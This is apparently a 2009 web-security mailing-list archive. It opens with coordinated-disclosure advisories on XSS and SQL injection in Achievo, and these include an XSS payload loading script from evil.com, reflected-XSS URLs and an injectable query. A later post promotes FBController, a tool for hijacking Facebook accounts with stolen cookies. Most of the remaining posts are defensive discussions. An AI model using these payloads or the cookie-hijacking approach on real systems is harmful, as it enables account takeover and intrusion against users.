1. *Advisory Information*

Title: Multiple XSS in Achievo
Advisory ID: BONSAI-2009-0101
Advisory URL: http://www.bonsai-sec.com/research/vulnerabilities/achievo-multiple-xss-0101.txt
Date published: 2009-10-13
Vendors contacted: Achievo
Release mode: Coordinated release

2. *Vulnerability Information*

Class: Multiple Cross Site Scripting (XSS)
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2009-2733

3. *Software Description*

Achievo is a flexible web-based resource management tool for business
environments. Achievo's resource management capabilities will enable
organizations to support their business processes in a simple, but effective
manner [0].

4. *Vulnerability Description*

Cross-Site Scripting attacks are a type of injection problem, in which
malicious scripts are injected into the otherwise benign and trusted web sites.
Cross-site scripting (XSS) attacks occur when an attacker uses a web
application to send malicious code, generally in the form of a browser side
script, to a different end user. Flaws that allow these attacks to succeed are
quite widespread and occur anywhere a web application uses input from a user
in the output it generates without validating or encoding it.

For additional information, please read [1].

5. *Vulnerable packages*

Version <= 1.3.4

6. *Non-vulnerable packages*

Achievo developers informed us that all users should upgrade to the latest
version of Achievo, which fixes this vulnerability. More information to be
found here:
http://www.achievo.org/

7. *Credits*

This vulnerability was discovered by Ryan Dewhurst ( ryan -at- bonsai-sec.com ).

8. *Technical Description*

8.1 A Persistent Cross Site Scripting vulnerability was found in the 'tittle'
variable within the scheduler module. This is because the application does not
properly sanitise the users input. The vulnerability can be triggered by a user
submitting the following data within the scheduler title:

<SCRIPT SRC=//evil.com/xss.js></SCRIPT>

Which will include the xss.js javascript file within the schedule. A javascript
that exploits this issue and creates a new administrator user in the system can
be found in Bonsai's blog [2].

8.2 A Reflected Cross Site Scripting vulnerability was found in the
atksearch[contractnumber], atksearch_AE_customer[customer] and
atksearchmode[contracttype] variables within the 'Organisation Contracts'
administration page. This is because the application does not properly sanitise
the users input. The vulnerability can be triggered by clicking on the
following URL:

http://www.example.com/dispatch.php?atkprevlevel=0&atkescape=&atknodetype=organization.contracts&atkaction=admin&atksmartsearch=clear&atkstartat=0&atksearch[contractnumber]="><script>alert('xss');</script>&atksearchmode[contractnumber]=substring&atksearch[contractname]="><script>alert('xss');</script>&atksearchmode[contractname]=substring&atksearch_AE_contracttype[contracttype][=&atksearchmode[contracttype]=exact&atksearch_AE_customer[customer]="><script>alert('xss');</script>&atksearchmode[customer]=substring

9. *Report Timeline*

- 2009-07-09:
Vulnerabilities were identified.

- 2009-08-08:
Vendor contacted.

- 2009-08-12:
Vendor confirmed vulnerabilities.

- 2009-08-14:
Vendor sets possible release date of fixed version to Monday 12 Oct.

- 2009-10-12:
Vendor released fixed version.

- 2009-10-13:
The advisory BONSAI-2009-0101 is published.

10. *References*

[0] http://www.achievo.org/
[1] http://www.owasp.org/index.php/Cross_site_scripting
[2] http://www.bonsai-sec.com/blog/index.php/cross-site-scripting-payloads/

11. *About Bonsai*

Bonsai is a company involved in providing professional computer
information security services.
Currently a sound growth company, since its foundation in early 2009
in Buenos Aires, Argentina,
we are fully committed to quality service, and focused on our
customers' real needs.

12. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Bonsai
Information Security, and may be
distributed freely provided that no fee is charged for this
distribution and proper credit is
given.

[BONSAI] SQL Injection in Achievo

2009-10-13T06:59:37Z

Bonsai Information Security - Advisory
http://www.bonsai-sec.com/research/

SQL Injection in Achievo

1. *Advisory Information*

Title: SQL Injection in Achievo
Advisory ID: BONSAI-2009-0102
Advisory URL: http://www.bonsai-sec.com/research/vulnerabilities/achievo-sql-injection-0102.txt
Date published: 2009-10-13
Vendors contacted: Achievo
Release mode: Coordinated release

2. *Vulnerability Information*

Class: SQL Injection
Remotely Exploitable: Yes
Locally Exploitable: Yes
CVE Name: CVE-2009-2734

3. *Software Description*

Achievo is a flexible web-based resource management tool for business
environments. Achievo's resource management capabilities will enable
organizations to support their business processes in a simple, but effective
manner [0].

4. *Vulnerability Description*

SQL injection is a code injection technique that exploits a security
vulnerability occurring in the database layer of an application. The
vulnerability is present when user input is either incorrectly filtered for
string literal escape characters embedded in SQL statements or user input
is not strongly typed and thereby unexpectedly executed.

For additional information, please look at the references [1] and [2].

5. *Vulnerable packages*

Version <= 1.3.4

6. *Non-vulnerable packages*

Achievo developers informed us that all users should upgrade to the latest
version of Achievo, which fixes this vulnerability. More information to be
found here:
http://www.achievo.org/

7. *Credits*

This vulnerability was discovered by Ryan Dewhurst ( ryan -at- bonsai-sec.com ).

8. *Technical Description*

A SQL injection vulnerability was found in the dispatch.php script, more
specifically in the $user_id variable. The vulnerability can be triggered by
logging into Achievo and browsing to:

/dispatch.php?atknodetype=reports.weekreport&atkaction=report&nameswitch=name&userid=%27&functionlevelswitch=all&startdate[day]=6&startdate[month]=7&startdate[year]=2009&enddate[day]=17&enddate[month]=7&enddate[year]=2009&showstatus=all&outputType=0&atkorderby=period

Which will generate a syntax error in the database. The following is
the corresponding piece of code:

classweekreport.inc:128-134
function get_employee($user_id)
{
$db = &atkGetDb();
$sql = "SELECT * FROM person WHERE status='active' AND id='$user_id'";
$record = $db->getrows($sql);
return $record[0];
}

9. *Report Timeline*

- 2009-07-09:
Vulnerabilities were identified.

- 2009-08-08:
Vendor contacted.

- 2009-08-12:
Vendor confirmed vulnerabilities.

- 2009-08-14:
Vendor sets possible release date of fixed version to Monday 12 Oct.

- 2009-10-12:
Vendor released fixed version.

- 2009-10-13:
The advisory BONSAI-2009-0101 is published.

10. *References*

[0] http://www.achievo.org/
[1] http://www.owasp.org/index.php/SQL_injection
[2] http://en.wikipedia.org/wiki/SQL_injection

11. *About Bonsai*

Bonsai is a company involved in providing professional computer
information security services.
Currently a sound growth company, since its foundation in early 2009
in Buenos Aires, Argentina,
we are fully committed to quality service, and focused on our
customers' real needs.

12. *Disclaimer*

The contents of this advisory are copyright (c) 2009 Bonsai
Information Security, and may be
distributed freely provided that no fee is charged for this
distribution and proper credit is
given.

WASC Announcement: Announcing the Web Application Security Scanner Evaluation Criteria v1

2009-10-08T11:08:35Z

The Web Application Security Consortium is pleased to announce the release
of version 1 of the Web Application Security Scanner Evaluation Criteria
(WASSEC). The goal of the WASSEC project is to create a vendor-neutral
document to help guide information security professionals during web
application scanner evaluations. The document provides a comprehensive list
of features that should be considered when conducting an evaluation. The
WASSEC project does not promote any specific products or tools, but instead
provides valuable information to help you make your own decision about which
of these tools best meets your needs.

The WASSEC document be found here in both wiki and PDF formats:
http://projects.webappsec.org/Web-Application-Security-Scanner-Evaluation-Cr
iteria

A large group of volunteers have contributed their expertise to the WASSEC
project. If you have questions or would like to contribute to future
enhancements of the WASSEC, you can the project leader, Brian Shura, at
bshura73@....

Regards,
- WASC Announcements

----------------------------------------------------------------------------
Join us on IRC: irc.freenode.net #webappsec

Have a question? Search The Web Security Mailing List Archives:
http://www.webappsec.org/lists/websecurity/archive/

Subscribe via RSS:
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Join WASC on LinkedIn
http://www.linkedin.com/e/gis/83336/4B20E4374DBA

FBController - (Facebook Control Utility) version 2.0

2009-09-15T10:03:45Z

FBController - The Ultimate Utility to Control Facebook accounts without the
Password.

Let me clear this again like last time that this utility WON'T hack/crack Facebook accounts.
The utility will need biscuits/cookies instead of the password.

Get the target's cookie by sniffing, XSS, social engineering, ARP Poison-Sniffing,
scroogle search, anyhow !
Once you have the cookies you can use FBController and have Full control over the
target's Facebook account.

==============================================================

==========================
Changes in version FBController 2.0
==========================

- You don't have to provide each and every cookie variable in the command parameter.
Just save your cookie into a file and point FBC towards it.

- Many changes have taken place over the time in the FB UI and the Cookie structure as explained
on the blog.

- FBConTroller v2.0 now has a menu based Operation making it easier to control.

- FBConTroller as of now can Write onto one's own wall, other's walls, Retrieve Profile Page,
Retrieve Friends List and even attempts to Retrieve Inbox and Send Messages.

Happy Controlling ! :-)
==============================================================

Download :
http://my.opera.com/quakerdoomer/blog/2009/09/15/fbcontroller-facebook-controller-v2

The Latest available release is FBCONTROLLER version 2.0
Coded by : Azim Poonawala (QUAKERDOOMER)
available on
Author's website : http://solidmecca.co.nr [ Under Left Side of the Page/Tools]

Regards,
QUAKERDOOMER

Re: How to enable LDAP signing on client side

2009-09-15T08:48:57Z

On Sep 14, 2009, at 7:21 AM, Jianrong Yu <yuj@...> wrote:

> How to enable LDAP signing on client side?

The goal of having the server sign LDAP results would be to give
confidence in the integrity if the answers. I don't understand what
the goal of having clients sign queries would be. If you use SSL, the
client-server exchange is kept confidential (subject to some
assumptions) and client-side certificates can be used by the server to
provide access control so rogue clients can't make requests.

How to enable LDAP signing on client side

2009-09-14T07:21:56Z

Hi All,

The link <http://support.microsoft.com/kb/935834> is the step the How to
enable LDAP signing in Windows Server 2008.

How to enable LDAP signing on client side?

Thanks,

Jianrong Yu
Systems Operation
Office of Information technology
Ohio University

nullcon Goa 2010 Call For Papers

2009-09-12T23:40:48Z

Calling all greyhats, whitehats, blackhats, rainbowhats, nohats,
underground, aboveground, in-the-sky, on-the-moon, Grannies,
Grandpas, martians, Doodhwalas, Kaamwalis, Bai, Bhai, Chuck norris Fans,
Mithun Da Fans, Himesh Reshamiya wannabees……..

Call For Paper is officially open for nullcon Goa 2010. It is time for
you to polish your paper, stick up an abstract and send it across.
A live demo/exploit/0day with the presentation might win you
some extra brownies.

WEBSITE
_______
http://nullcon.net

About null
________
null – The open security community (http://null.co.in) , a non-profit
initiative,
is a community of security professionals who have passion for security
research and contribute towards research and development, knowledge sharing
in the field of computer security.

nullcon Goa 2010 is our First effort towards organizing an
International Hack Fest
and is totally a community driven effort by the members of null community.

TRACKS
_______
The conference will run on the following two serial tracks:
1) Gurukul Track – 1 hr sessions
2) Turbo Track – 10/15/20 min sessions

Don’t have a full fledged 1 hr paper ??? Don’t be disheartened, we
have the Turbo Track with 10-20 minute talks.
If you have a neat hack/0day/idea/Research in Progress, simply submit on
the turbo track.

TOPICS
______
Topic could be anything from Auto meter crooking, hacking cars to
hacking mobile networks, anything that would make people standup and
take notice.

A subset of topics we would be interested in (but not
limited to): Application security, Web security, social engineering,
Mobile Networks GSM/CDMA/3G, Bluetooth, OS/Kernel, Virtualization,
cloud security/hacking, protocol vulnerabilities, hardware security,
cyber warfare, cyber forensics, cryptography, spam, malware, L2-L4
hacking.

SUBMISSIONS
____________
Initially an abstract will be required with your details.
Send an email to (cfp _at_ nullcon.net) in the following format:
Subject should be: nullcon Goa 2010 CFP <Paper Title>

Track: Gurukul / Turbo
Name:
Handle:
Nationality:
Organization:
Email:
Contact no:
Paper Abstract: (Max 6000 words)
Have You Presented this paper at any another conference? If Yes, Where?
Why do you think your work is innovative or different?

NOTE: It is mandatory for the participants, whose papers are selected, to send
us the final presentation (ppt, odp format) and the full paper (doc, pdf format)
containing the detailed explanation of presentation, within the
stipulated time (as mentioned below). The abstract should clearly
define your findings in detail with factual information. Just stating that
‘it works’ may not help us understand your work correctly.

IMPORTANT DEADLINES
____________________
CFP Closes – 15th Dec 2009
Selection Notification – 25th Dec 2009
Submission of final Paper and presentation material – 5th Jan 2010.

SPEAKER PRIVILEGES FOR GURUKUL TRACK
______________________________________
Free accommodation.
Fixed amount of reimbursement for travel (TBD).
Invitation to the post conference party.
Free access to the conference.

SPEAKER PRIVILEGES FOR TURBO TRACK
___________________________________
Speaker privileges for Gurukul track will not be extended to Turbo
track; however heavy discounts on entry fee will be provided.

Regards,
null Team

Running ratproxy from windows command prompt without installing cygwin

2009-09-10T03:34:36Z

Hi,
Can anybody tell me how to run ratproxy from windows comand prompt,without installing cygwin.

Re: Web 2.0 support group

2009-09-09T13:11:20Z

The Payment Card Industry Security Standards and Payment Application Data
Security Standards attempt to get programmers to code securely. I
underline attempt. We as payment application developers must follow
owasp.org standards and common sense security best business practises for
developing any type of code, hardening servers and locking down network
systems,as well as assuring our physical environments are locked down to
maintain our PCI DSS compliance. As we do these types of assessments it
is frightening the lack of education and training on all aspects of
physical and IT application development and hosting security. Education,
training and attention to security best business practises for all types
of software and languages is necessary to minimize the rising criminal
activity. PCI DSS and the other security requirements for doing business
online is just the first small step to getting all applications coded
securely to avoid data loss, fraud and identity theft. We also need a
committment from all application developers to code securely...as we have
a committment from security professionals, law enforcement, the card
associations and payment service providers and acuirting facilities to
make this happen...Go to the PCI Security Standards website - you can
google it...it is a first start at getting our industry standardized for
coding securely....

> Steven M. Christey wrote:
>> So I've been an observer of the "Web 2.0 is a security nightmare" camp
>> with the occasional head nods and detached agreement, being enough of a
>> generalist that I didn't have anything to add to the alarms raised by
>> the
>> specialists. Where is the support group for those who have recently
>> realized just how desperate the situation is?
>>
>> I'm not being entirely facetious. Is there any hope at all?
>>
>> - Steve
>>
>>
>
> 1. No, but there is no hope for generalized security apart from "Web
> 2.0" either. There is only risk reduction.
>
> 2. Stop complaining about Web 2.0. Really. It doesn't exist. There
> are security problems specific to JSON, AJAX, REST, SOAP, FLEX, social
> networking, P2P, etc. If you want to actually discuss the risk, name
> the risk you're interested in. Web 2.0 doesn't mean anything we can
> discuss like rational people. Same goes for "the Cloud".
>
> Steve
> --
> | Steven E. Pinkham |
> | Security Researcher, Maven Security |
> | steve.pinkham@... |
> | GPG public key ID CD31CAFB |
>
>

Catherine Pagliaro, B.B.A.,
CEO, C.N. Wylie Group Inc.
703 - 889 West Pender, Vancouver, BC V6C3B2
#13 - 465 King Street East, Toronto, On, M5A1L6
Tel: 1 800 811-7811
Toronto
Tel: 905 910-0575
www.cnwylie.com
PRIVILEGE AND CONFIDENTIALITY NOTICE This electronic transmission,
including all attachments, is directed in confidence solely to the
person(s) to which it is addressed, or an authorized recipient, and may
not otherwise be distributed, copied, printed or disclosed. If you have
received this electronic transmission in error, please notify the sender
immediately by return electronic transmission and then immediately delete
this
transmission, including all attachments, without copying, printing,
distributing or disclosing same. Thank you.

RE: Securing password between webserver & appserver.

2009-09-09T11:14:39Z

Don that is an interesting suggestion

Do you have more specific information, since I only know that SSL/IPSec
can be end-to-end in a per link basis, but the idea of a real End-to-End
encryption using SSL, that is the case of Chintan is interesting.

Any link or whitepaper on how to do this in Tomcat as you mention?

Regards,
Juan Carlos

-----Original Message-----
From: listbounce@... [mailto:listbounce@...]
On Behalf Of bigbert007
Sent: Martes, 08 de Septiembre de 2009 10:34 p.m.
To: webappsec@...
Subject: Re: Securing password between webserver & appserver.

Till - great recommendation, I'll expand on it.

Depending on the back end app server, there is usually a mechanism in
place for creating a trust between the web server and appserver and then

encrypting that connection with SSL. When credentials are entered the
entire pipe is encrypted from the client > webserver > app server based
upon that trust relationship and SSL- encrypted connection

Websphere has this option available as does Tomcat. I suspect that
Coldfusion and other app servers have something similar.

Good luck.

Don

Till Elsner wrote:

> What about securing (i.e. encrypting) the connection between web
> server and app server itself, like connecting to the app server from
> the web server via a SSH-forwarded local port? You could keep the
> original authentication method and have the entire communication
> encrypted anyway.
>
> Greetings
> Till
>
> Am 07.09.2009 um 08:04 schrieb Chintan Oza:
>
>> Dear All,
>>
>> We have a web application which perform user authentication on
>> id+password basis.
>>
>> The architecture is like this.
>> Browser<-HTTPS->WebServer<-->AppServer
>>
>> We have a requirement where password should not be available to the
>> WebServer (even in hashed format).
>>
>> Only solution that I can think of is having an Applet performing PKI
>> encryption on the password before submitting the form.
>>
>> Please suggest if there are any better alternatives.
>>
>> Thanks,
>>
>> Chintan
>>
>>
>
>
>

Re: Web 2.0 support group

2009-09-09T06:10:56Z

Steven M. Christey wrote:

> So I've been an observer of the "Web 2.0 is a security nightmare" camp
> with the occasional head nods and detached agreement, being enough of a
> generalist that I didn't have anything to add to the alarms raised by the
> specialists. Where is the support group for those who have recently
> realized just how desperate the situation is?
>
> I'm not being entirely facetious. Is there any hope at all?
>
> - Steve
>
>

1. No, but there is no hope for generalized security apart from "Web
2.0" either. There is only risk reduction.

2. Stop complaining about Web 2.0. Really. It doesn't exist. There
are security problems specific to JSON, AJAX, REST, SOAP, FLEX, social
networking, P2P, etc. If you want to actually discuss the risk, name
the risk you're interested in. Web 2.0 doesn't mean anything we can
discuss like rational people. Same goes for "the Cloud".

Steve
--
| Steven E. Pinkham |
| Security Researcher, Maven Security |
| steve.pinkham@... |
| GPG public key ID CD31CAFB |

Web 2.0 support group

2009-09-08T22:21:20Z

So I've been an observer of the "Web 2.0 is a security nightmare" camp
with the occasional head nods and detached agreement, being enough of a
generalist that I didn't have anything to add to the alarms raised by the
specialists. Where is the support group for those who have recently
realized just how desperate the situation is?

I'm not being entirely facetious. Is there any hope at all?

- Steve

Re: Securing password between webserver & appserver.

2009-09-08T20:34:09Z

Till - great recommendation, I'll expand on it.

Depending on the back end app server, there is usually a mechanism in
place for creating a trust between the web server and appserver and then
encrypting that connection with SSL. When credentials are entered the
entire pipe is encrypted from the client > webserver > app server based
upon that trust relationship and SSL- encrypted connection

Websphere has this option available as does Tomcat. I suspect that
Coldfusion and other app servers have something similar.

Good luck.

Don

Till Elsner wrote:

Re: Securing password between webserver & appserver.

2009-09-08T16:58:18Z

What about securing (i.e. encrypting) the connection between web
server and app server itself, like connecting to the app server from
the web server via a SSH-forwarded local port? You could keep the
original authentication method and have the entire communication
encrypted anyway.

Greetings
Till

Am 07.09.2009 um 08:04 schrieb Chintan Oza:

> Dear All,
>
> We have a web application which perform user authentication on
> id+password basis.
>
> The architecture is like this.
> Browser<-HTTPS->WebServer<-->AppServer
>
> We have a requirement where password should not be available to the
> WebServer (even in hashed format).
>
> Only solution that I can think of is having an Applet performing PKI
> encryption on the password before submitting the form.
>
> Please suggest if there are any better alternatives.
>
> Thanks,
>
> Chintan
>
>

Re: Securing password between webserver & appserver.

2009-09-08T09:15:09Z

You're right, the client side CC is just another alternative if you're
worried about passwords being in clear text. If you have Client side
certs you can probably even do away with authentication as only
specific users will have the cert, though most places have the cert
and the login form as well to protect against the cert being stolen.

The SSL , yes will end at the Web server..but hey that is what it is
supposed to do. The deal though is - If you have a salted hash
mechanism with the salt controlled at the server, the password will
still be encrypted ...NOT by the SSL but because of the salt and the
MD5/SHA1 you are using on the client side to encrypt it.

The Client side code in this case won't be bypasssed. Well, I mean you
can of course intercept and remove the Javascript but the server won't
accept a request without a valid salted password hash..so you should
be fine. A lot of apps I've seen do this.

Lastly if you're concerned with the traffic between the WebServer and
the DB, you'll want to ensure that all your queries are also sent over
SSL(You'll probably need to enable this on the DB first). Incase your
app server(Tomcat/Weblogic etc) if at all you have one is on a
separate server , you'll need to look at encrypting content between:

a)Client and the WS
b WS and the AS
c)AS and the DB

Hope that clarifies things a little more.

Cheers
Arvind

On Tue, Sep 8, 2009 at 10:50 AM, Chintan Oza<chintan.oza@...> wrote:

> Hi Arvind,
>
> There are 1 set of users for which password verification is done by
> over server where as in case of other group of users the password
> verification will be done by a third party system which expects
> password in the plain format.
>
> Correct me if I am wrong but usage of client certificate doesnt help
> protect communication between web server and app server as its job
> ends at web server which handles ssl.
>
> Thanks,
>
> Chintan

RE: Securing password between webserver & appserver.

2009-09-08T06:14:00Z

> Or why not bypass the webserver altogether
> for auth if itisnt trusted. Send credentials
> directly to the app server, that is assuming
> the app server is publicly accesible.

Yup, would work. However, it would be a novel situation in which the
credentials were sensitive, but the data was not.

I would personally be trying to resolve the untrusted web server
situation...

Martin...

RE: Securing password between webserver & appserver.

2009-09-07T23:16:29Z

> You are right. Without changing your
> architecture or requirements you would
> have to have the client encrypt the
> message before sending it through an
> untrusted web server.

Just stating the obvious here though; if the web server is genuinely
untrusted, then logically none of this can be secured anyway.

An attacker at the web server is a classic MITM. All they need to do is
remove the client side auth code as it passes on the way out to the
client, and then they will always receive a clear-text password back
from the client. POW!

If you don't trust the server, then a web delivery mechanism probably
isn't the right architecture at all.

Martin...

Re: Securing password between webserver & appserver.

2009-09-07T22:20:15Z

Hi Arvind,

There are 1 set of users for which password verification is done by
over server where as in case of other group of users the password
verification will be done by a third party system which expects
password in the plain format.

Correct me if I am wrong but usage of client certificate doesnt help
protect communication between web server and app server as its job
ends at web server which handles ssl.

Thanks,

Chintan

On Mon, Sep 7, 2009 at 9:59 PM, arvind
doraiswamy<arvind.doraiswamy@...> wrote:

> Hey Chintan,
> Yes client side certificates are possible but a big pain if you have a
> large number of users to whom you have to distribute them too.
>
> However I'm curious, a properly implemented salted hash solution where
> the salt is randomly generated and matched on the server each time the
> client sends it will prevent a lot of attacks. Note - the server
> decides the salt, not the client.
>
> So while I am not contesting your requirement and your reasons I think
> that not much harm is done even if the webserver sees the
> salted-hashed password. It can't be cracked , it can't be replayed so
> what's the problem?
>
> Am I missing something?
>
> Cheers
> Arvind
>
> On Mon, Sep 7, 2009 at 11:34 AM, Chintan Oza<chintan.oza@...> wrote:
>> Dear All,
>>
>> We have a web application which perform user authentication on
>> id+password basis.
>>
>> The architecture is like this.
>> Browser<-HTTPS->WebServer<-->AppServer
>>
>> We have a requirement where password should not be available to the
>> WebServer (even in hashed format).
>>
>> Only solution that I can think of is having an Applet performing PKI
>> encryption on the password before submitting the form.
>>
>> Please suggest if there are any better alternatives.
>>
>> Thanks,
>>
>> Chintan
>>
>>
>>
>

RE: Securing password between webserver & appserver.

2009-09-07T20:48:41Z

Is this an internal application? Kerberos can be used to solve this problem for internal apps.

Alternatively, can you use client certificate based authentication?

Cheers
Ken

-----Original Message-----
From: listbounce@... [mailto:listbounce@...] On Behalf Of Chintan Oza
Sent: Monday, 7 September 2009 2:04 PM
To: webappsec@...
Subject: Securing password between webserver & appserver.

Dear All,

We have a web application which perform user authentication on
id+password basis.

The architecture is like this.
Browser<-HTTPS->WebServer<-->AppServer

We have a requirement where password should not be available to the WebServer (even in hashed format).

Only solution that I can think of is having an Applet performing PKI encryption on the password before submitting the form.

Please suggest if there are any better alternatives.

Thanks,

Chintan